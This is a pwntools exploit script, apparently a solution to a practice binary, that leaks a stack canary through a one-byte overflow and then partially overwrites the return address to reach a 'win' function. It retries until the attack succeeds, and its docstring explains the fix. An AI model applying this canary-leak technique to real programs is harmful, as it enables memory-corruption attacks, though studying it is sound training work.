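from pwn import *

# Exercise binary; its `win` symbol is the function the overflow is
# redirected to.
filename = './overflow_canary_leak'
elf = ELF(filename)


def run_once():
    """Run one attempt against a fresh process; return 1 on success, 0 otherwise.

    What the attempt demonstrates, for anyone reviewing the target:
    1. The first write overruns the buffer by exactly one byte so the
       canary's low byte (expected to be 0x00, re-inserted below) is
       clobbered. Because the program echoes the buffer back, the seven
       bytes that follow the echoed input are the rest of the canary.
    2. The second write puts the recovered canary back in place so the
       check passes, then replaces only the low 16 bits of the saved
       return address. The higher bytes are left as they were, so a
       single attempt can fail; the caller retries until one succeeds.

    Fixing the target means bounding the read to the buffer size and not
    echoing caller-supplied data past its actual length.

    Raises:
        EOFError: if the process exits before either prompt is reached
            (only the final ``you win`` read is treated as a soft failure).
    """
    p = process(filename)
    try:
        ### Between the start of the buffer and the canary
        data = b'a'*0x18
        data += b'c'*1  ## overflow 1 byte of canary for null byte
        p.readuntil(b'dataz: ')
        p.send(data)
        # Skip to the echoed input; the 7 bytes after it are the canary
        # minus the low byte we overwrote, which is restored here.
        p.readuntil(b'said: ')
        p.readuntil(data)
        canary = u64(b'\x00' + p.read(7))
        print(hex(canary))

        p.readuntil(b'dataz: ')
        data = b'a'*0x18
        data += p64(canary)  # intact canary so the check passes
        data += b'c'*8  ## saved rbp
        data += p16(elf.symbols['win'])  # only the low 16 bits are replaced
        p.send(data)
        try:
            print(p.readuntil(b'you win'))
            return 1
        except EOFError:
            # The process exited before printing the marker; report
            # failure so the caller retries. Narrowed from a bare
            # `except:` so Ctrl-C and real bugs are no longer swallowed.
            return 0
    finally:
        # Release the child process and its pipes on every attempt; the
        # original left one process behind per failed run.
        p.close()


while not run_once():
    pass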